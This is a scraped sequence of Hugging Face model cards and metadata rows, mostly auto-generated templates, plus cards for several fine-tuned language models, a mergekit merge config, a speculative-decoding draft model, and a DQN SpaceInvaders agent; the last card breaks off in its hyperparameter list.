### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed to the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
reza-rgb/M3_attempt_hh_rlhf | reza-rgb | 2025-06-09T13:52:24Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"qwen3",
"text-generation",
"conversational",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2025-06-09T13:50:48Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed to the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
reza-rgb/M3_attempt_stanford | reza-rgb | 2025-06-09T13:52:23Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"qwen3",
"text-generation",
"conversational",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2025-06-09T13:51:07Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed to the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
publication-charaf/MIX_qwen-sft-smoltalk_lr-1e-06_e-3_s-0 | publication-charaf | 2025-06-09T13:50:55Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"qwen3",
"text-generation",
"generated_from_trainer",
"trl",
"sft",
"conversational",
"base_model:lipefree/qwen-sft-smoltalk",
"base_model:finetune:lipefree/qwen-sft-smoltalk",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"regi... | text-generation | 2025-06-09T10:16:09Z | ---
base_model: lipefree/qwen-sft-smoltalk
library_name: transformers
model_name: MIX_qwen-sft-smoltalk_lr-1e-06_e-3_s-0
tags:
- generated_from_trainer
- trl
- sft
licence: license
---
# Model Card for MIX_qwen-sft-smoltalk_lr-1e-06_e-3_s-0
This model is a fine-tuned version of [lipefree/qwen-sft-smoltalk](https://huggingface.co/lipefree/qwen-sft-smoltalk).
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="publication-charaf/MIX_qwen-sft-smoltalk_lr-1e-06_e-3_s-0", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
[<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/kamel-charaf-epfl/huggingface/runs/nlmxus54)
This model was trained with SFT.
### Framework versions
- TRL: 0.17.0
- Transformers: 4.51.3
- Pytorch: 2.6.0
- Datasets: 3.5.0
- Tokenizers: 0.21.1
## Citations
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
``` |
yahyaahmed/tinyllama-lora-squad_16_5e-05_2_lora16_qvk | yahyaahmed | 2025-06-09T13:37:24Z | 0 | 0 | peft | [
"peft",
"safetensors",
"generated_from_trainer",
"base_model:TinyLlama/TinyLlama-1.1B-Chat-v1.0",
"base_model:adapter:TinyLlama/TinyLlama-1.1B-Chat-v1.0",
"license:apache-2.0",
"region:us"
] | null | 2025-06-09T06:52:17Z | ---
library_name: peft
license: apache-2.0
base_model: TinyLlama/TinyLlama-1.1B-Chat-v1.0
tags:
- generated_from_trainer
model-index:
- name: tinyllama-lora-squad_16_5e-05_2_lora16_qvk
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# tinyllama-lora-squad_16_5e-05_2_lora16_qvk
This model is a fine-tuned version of [TinyLlama/TinyLlama-1.1B-Chat-v1.0](https://huggingface.co/TinyLlama/TinyLlama-1.1B-Chat-v1.0) on an unknown dataset.
It achieves the following results on the evaluation set:
- Loss: 0.0069
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 5e-05
- train_batch_size: 4
- eval_batch_size: 4
- seed: 42
- gradient_accumulation_steps: 4
- total_train_batch_size: 16
- optimizer: AdamW (torch) with betas=(0.9, 0.999) and epsilon=1e-08; no additional optimizer arguments
- lr_scheduler_type: linear
- lr_scheduler_warmup_steps: 100
- num_epochs: 2
- mixed_precision_training: Native AMP
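As an illustration only, the hyperparameters listed above map onto the Hugging Face Trainer API roughly as follows; the parameter names follow `transformers.TrainingArguments`, but this is a sketch rather than the exact training script used:

```python
# Sketch: the reported hyperparameters collected as they might be passed
# to transformers.TrainingArguments (illustrative, not the actual script).
hparams = {
    "learning_rate": 5e-05,
    "per_device_train_batch_size": 4,
    "per_device_eval_batch_size": 4,
    "seed": 42,
    "gradient_accumulation_steps": 4,
    "lr_scheduler_type": "linear",
    "warmup_steps": 100,
    "num_train_epochs": 2,
    "fp16": True,  # "Native AMP" mixed precision
}

# The effective (total) train batch size is the per-device batch size
# times the gradient accumulation steps (single device assumed):
total_train_batch_size = (
    hparams["per_device_train_batch_size"]
    * hparams["gradient_accumulation_steps"]
)
print(total_train_batch_size)  # 16, matching the value reported above
```

This explains why the table reports a total train batch size of 16 while each forward pass only sees 4 examples: gradients are accumulated over 4 micro-batches before each optimizer step.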
### Training results
| Training Loss | Epoch | Step | Validation Loss |
|:-------------:|:------:|:----:|:---------------:|
| 7.7854 | 0.2002 | 124 | 0.0125 |
| 0.0106 | 0.4003 | 248 | 0.0097 |
| 0.009 | 0.6005 | 372 | 0.0085 |
| 0.0082 | 0.8006 | 496 | 0.0077 |
| 0.0071 | 1.0016 | 620 | 0.0075 |
| 0.0065 | 1.2018 | 744 | 0.0074 |
| 0.0063 | 1.4019 | 868 | 0.0071 |
| 0.0061 | 1.6021 | 992 | 0.0069 |
| 0.0064 | 1.8023 | 1116 | 0.0069 |
### Framework versions
- PEFT 0.14.0
- Transformers 4.51.3
- Pytorch 2.6.0+cu124
- Datasets 3.6.0
- Tokenizers 0.21.1 |
PepitaxX/lora16-W4A16 | PepitaxX | 2025-06-09T13:35:12Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"qwen3",
"text-generation",
"conversational",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"compressed-tensors",
"region:us"
] | text-generation | 2025-06-09T13:34:44Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed to the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
jukofyork/DeepSeek-R1-0528-CODER-DRAFT-0.6B-v1.0-GGUF | jukofyork | 2025-06-09T13:34:18Z | 0 | 0 | null | [
"gguf",
"draft",
"speculative-decoding",
"zho",
"eng",
"fra",
"spa",
"por",
"deu",
"ita",
"rus",
"jpn",
"kor",
"vie",
"tha",
"ara",
"dataset:open-thoughts/OpenThoughts-Unverified-173k",
"dataset:cognitivecomputations/dolphin-r1",
"base_model:jukofyork/DeepSeek-V3-0324-CODER-DRAFT... | null | 2025-06-09T12:47:06Z | ---
license: apache-2.0
base_model:
- jukofyork/DeepSeek-V3-0324-CODER-DRAFT-0.6B-v1.0
datasets:
- open-thoughts/OpenThoughts-Unverified-173k
- cognitivecomputations/dolphin-r1
tags:
- draft
- speculative-decoding
language:
- zho
- eng
- fra
- spa
- por
- deu
- ita
- rus
- jpn
- kor
- vie
- tha
- ara
---

A `0.6B` parameter draft (speculative decoding) model for use with [deepseek-ai/DeepSeek-R1-0528](https://huggingface.co/deepseek-ai/DeepSeek-R1-0528) and [deepseek-ai/DeepSeek-R1](https://huggingface.co/deepseek-ai/DeepSeek-R1).
**NOTE**: This is a draft model for the **full-sized** `DeepSeek-R1-0528` / `DeepSeek-R1` models and not the smaller "distilled" models!
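As a usage sketch, the draft model is passed to llama.cpp alongside the full-sized target model. The flags and paths below are illustrative only (the target-model filename is a placeholder, and the speculative-decoding options have changed across llama.cpp versions):

```bash
# -m  : the full-sized DeepSeek-R1-0528 target model (placeholder path)
# -md : this 0.6B draft model
llama-server \
  -m  DeepSeek-R1-0528-Q4_K_M.gguf \
  -md DeepSeek-R1-0528-CODER-DRAFT-0.6B-Q4_0.gguf \
  --draft-max 16 --draft-min 4 \
  -c 8192
```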
---
I've only included the `Q4_0` quant: [DeepSeek-R1-0528-CODER-DRAFT-0.6B-Q4_0.gguf](https://huggingface.co/jukofyork/DeepSeek-R1-0528-CODER-DRAFT-0.6B-v1.0-GGUF/blob/main/DeepSeek-R1-0528-CODER-DRAFT-0.6B-Q4_0.gguf)
as the model's 14 attention heads don't allow any of the other 4-bit quants to be made, and experimentation has shown that using more or fewer than 4 bits for a speculative-decoding draft model is a waste of time. |
Darkhn/L3.3-70B-Amalgamma-V13 | Darkhn | 2025-06-09T13:23:16Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"mergekit",
"merge",
"conversational",
"arxiv:2406.11617",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2025-06-09T11:51:10Z | ---
base_model: []
library_name: transformers
tags:
- mergekit
- merge
---
# merged_model_output
This is a merge of pre-trained language models created using [mergekit](https://github.com/cg123/mergekit).
## Merge Details
### Merge Method
This model was merged using the [DELLA](https://arxiv.org/abs/2406.11617) merge method using /media/administrator/oiseauxai1data/modelweights/L3.3-70B-Smart-Base-V2 as a base.
### Models Merged
The following models were included in the merge:
* /media/administrator/oiseauxai1data/modelweights/L3.3-70B-Story-Base-V2
* /media/administrator/oiseauxai1data/modelweights/L3.3-70B-Middle-Base-sce-V1
* /media/administrator/oiseauxai1data/modelweights/L3.3-70B-Dark-Base-sce-V1
### Configuration
The following YAML configuration was used to produce this model:
```yaml
# --- Mergekit Example: della_linear ---
# Method: Implements DELLA (Drop and rEscaLe via sampLing with mAgnitude, arXiv:2406.11617).
# Delta parameters are stochastically pruned by magnitude, rescaled, and then linearly combined.
base_model: /media/administrator/oiseauxai1data/modelweights/L3.3-70B-Smart-Base-V2 # The foundational model
models:
- model: /media/administrator/oiseauxai1data/modelweights/L3.3-70B-Dark-Base-sce-V1
parameters:
weight: [0.3, 0.3, 0.4] # Contribution of this model; can also be a per-layer gradient, e.g. [0.1, 0.1, 0.1, 0.2, 0.5]
density: 0.60 # Sparsity/pruning factor for this model's contribution.
epsilon: 0.15 # Single epsilon for the pruning
- model: /media/administrator/oiseauxai1data/modelweights/L3.3-70B-Story-Base-V2
parameters:
weight: [0.4, 0.3, 0.3] # Contribution of this model; can also be a per-layer gradient, e.g. [0.1, 0.1, 0.1, 0.2, 0.5]
density: 0.10 # Sparsity/pruning factor for this model's contribution.
epsilon: 0.05 # Single epsilon for the pruning
- model: /media/administrator/oiseauxai1data/modelweights/L3.3-70B-Middle-Base-sce-V1
parameters:
weight: [0.3, 0.4, 0.3] # Contribution of this model; can also be a per-layer gradient, e.g. [0.1, 0.1, 0.1, 0.2, 0.5]
density: 0.60 # Sparsity/pruning factor for this model's contribution.
epsilon: 0.15 # Single epsilon for the pruning
model_name: L3.3-70B-Amalgamma-V13 # Name of your merge
dtype: float32 # Input size float32, float16, bfloat16
out_dtype: bfloat16 # output size float32, float16, bfloat16
merge_method: della
parameters:
normalize: false # If true (default), weights are normalized to sum to 1.
# If false, absolute weights are used.
lambda: 1.08 # Single lambda for scaling the final merged deltas
tokenizer_source: /media/administrator/oiseauxai1data/modelweights/Llama-3.3-70B-Vulpecula-r1 # Or 'base' if base_model is set, or 'union', careful with this one
chat_template: llama3 # Template for chat (Chatml, llama3, etc...)
license: apache-2.0 # License type
```
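As a reproduction sketch, a configuration like the one above is typically executed with mergekit's CLI (paths are placeholders; `--cuda` assumes a GPU is available):

```bash
pip install mergekit
# config.yaml contains the YAML above; the merged model is written to ./merged
mergekit-yaml config.yaml ./merged --cuda
```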
|
jinx2321/byt5-1e4-paper-distilled-je-9 | jinx2321 | 2025-06-09T13:16:20Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"t5",
"text2text-generation",
"generated_from_trainer",
"base_model:jinx2321/byt5-1e4-paper-je",
"base_model:finetune:jinx2321/byt5-1e4-paper-je",
"license:apache-2.0",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text2text-generation | 2025-06-09T12:28:56Z | ---
library_name: transformers
license: apache-2.0
base_model: jinx2321/byt5-1e4-paper-je
tags:
- generated_from_trainer
model-index:
- name: byt5-1e4-paper-distilled-je-9
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# byt5-1e4-paper-distilled-je-9
This model is a fine-tuned version of [jinx2321/byt5-1e4-paper-je](https://huggingface.co/jinx2321/byt5-1e4-paper-je) on an unspecified dataset.
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 0.0001
- train_batch_size: 128
- eval_batch_size: 8
- seed: 42
- optimizer: AdamW (adamw_torch) with betas=(0.9, 0.999) and epsilon=1e-08; no additional optimizer arguments
- lr_scheduler_type: linear
- num_epochs: 3
### Training results
### Framework versions
- Transformers 4.52.0.dev0
- Pytorch 2.6.0+cu124
- Datasets 3.4.1
- Tokenizers 0.21.1
|
epidrone/dqn-SpaceInvadersNoFrameskip-v4 | epidrone | 2025-06-09T13:15:33Z | 0 | 0 | stable-baselines3 | [
"stable-baselines3",
"SpaceInvadersNoFrameskip-v4",
"deep-reinforcement-learning",
"reinforcement-learning",
"model-index",
"region:us"
] | reinforcement-learning | 2025-06-09T13:13:13Z | ---
library_name: stable-baselines3
tags:
- SpaceInvadersNoFrameskip-v4
- deep-reinforcement-learning
- reinforcement-learning
- stable-baselines3
model-index:
- name: DQN
results:
- task:
type: reinforcement-learning
name: reinforcement-learning
dataset:
name: SpaceInvadersNoFrameskip-v4
type: SpaceInvadersNoFrameskip-v4
metrics:
- type: mean_reward
value: 678.50 +/- 165.74
name: mean_reward
verified: false
---
# **DQN** Agent playing **SpaceInvadersNoFrameskip-v4**
This is a trained model of a **DQN** agent playing **SpaceInvadersNoFrameskip-v4**
using the [stable-baselines3 library](https://github.com/DLR-RM/stable-baselines3)
and the [RL Zoo](https://github.com/DLR-RM/rl-baselines3-zoo).
The RL Zoo is a training framework for Stable Baselines3
reinforcement learning agents,
with hyperparameter optimization and pre-trained agents included.
## Usage (with SB3 RL Zoo)
RL Zoo: https://github.com/DLR-RM/rl-baselines3-zoo<br/>
SB3: https://github.com/DLR-RM/stable-baselines3<br/>
SB3 Contrib: https://github.com/Stable-Baselines-Team/stable-baselines3-contrib<br/>
SBX (SB3 + Jax): https://github.com/araffin/sbx
Install the RL Zoo (with SB3 and SB3-Contrib):
```bash
pip install rl_zoo3
```
```bash
# Download model and save it into the logs/ folder
python -m rl_zoo3.load_from_hub --algo dqn --env SpaceInvadersNoFrameskip-v4 -orga epidrone -f logs/
python -m rl_zoo3.enjoy --algo dqn --env SpaceInvadersNoFrameskip-v4 -f logs/
```
If you installed the RL Zoo3 via pip (`pip install rl_zoo3`), from anywhere you can do:
```bash
python -m rl_zoo3.load_from_hub --algo dqn --env SpaceInvadersNoFrameskip-v4 -orga epidrone -f logs/
python -m rl_zoo3.enjoy --algo dqn --env SpaceInvadersNoFrameskip-v4 -f logs/
```
## Training (with the RL Zoo)
```bash
python -m rl_zoo3.train --algo dqn --env SpaceInvadersNoFrameskip-v4 -f logs/
# Upload the model and generate video (when possible)
python -m rl_zoo3.push_to_hub --algo dqn --env SpaceInvadersNoFrameskip-v4 -f logs/ -orga epidrone
```
## Hyperparameters
```python
OrderedDict([('batch_size', 32),
('buffer_size', 100000),
('env_wrapper',
['stable_baselines3.common.atari_wrappers.AtariWrapper']),
('exploration_final_eps', 0.01),
('exploration_fraction', 0.1),
